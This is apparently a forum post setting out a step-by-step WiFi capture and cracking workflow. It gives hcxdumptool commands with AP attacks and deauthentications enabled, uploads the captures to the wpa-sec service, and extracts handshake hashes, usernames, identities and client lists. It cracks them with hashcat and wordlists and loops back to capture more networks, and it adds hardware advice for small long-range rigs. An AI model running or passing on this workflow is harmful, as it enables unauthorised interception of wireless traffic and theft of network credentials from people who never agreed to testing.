1) capture traffic:
new area:
hcxdumptool --gpio_button=4 --gpio_statusled=17 -i $WLANDEV -o $ARCHIVNAME.pcapng --poweroff --filterlist=blacklistown --filtermode=1 --give_up_ap_attacks=100000 --give_up_deauthentications=100000
discovered area:
hcxdumptool --gpio_button=4 --gpio_statusled=17 -i $WLANDEV -o $ARCHIVNAME.pcapng --poweroff --filterlist=blacklistown --filtermode=1 --disable_ap_attacks --disable_deauthentications -t 120
2) upload data to wpa-sec:
wlancap2wpasec *.pcapng
3) convert to hashfiles / wordlists or run wlanstrip:
hcxpcaptool -o new.hccapx -k new.16800 -E essidlist -I identitylist -U usernameliste -P pmklist -X clientlist --md5-out=hash.4800 --netntlm=hash.5500 *.*
4) pipe hcxpsktool, hcxwltool output to hashcat and run them against the hashes.
or run hcxallneu (or hcx2500neu or hcx16800neu)
5) wait until wpa-sec has finished, download cracked.txt and rkg.txt and run them against your hashes
6) loop back to 1 to capture new traffic
Attached are the scripts and rules to build up a complete environment. You just need to change the path.
Also you need 2 wordlists (names [namen] and months [monate])
scripts&rules.zip (Size: 4.98 KB / Downloads: 24)
Don't be surprised by the high value of nonce-error-corrections; I have to analyze really, really ugly cap files.
On hcxdumptool pcapng files you can set it to 0, 1 or 2.
Unfortunately I have no strategy to break a single network, because I'm not interested in breaking single networks.
Goal is to find a weak point within the system.
BTW:
A Raspberry Zero WH is the best choice. Low power consumption and small size.
The onboard WiFi SoC is really, really ugly in combination with hcxdumptool.
Penetration testing systems 3, 4, 5 are line of sight (LOS) systems with extremely long range capabilities.
Do not run a high-power WiFi dongle - a high-gain antenna in combination with a low-power dongle is much better.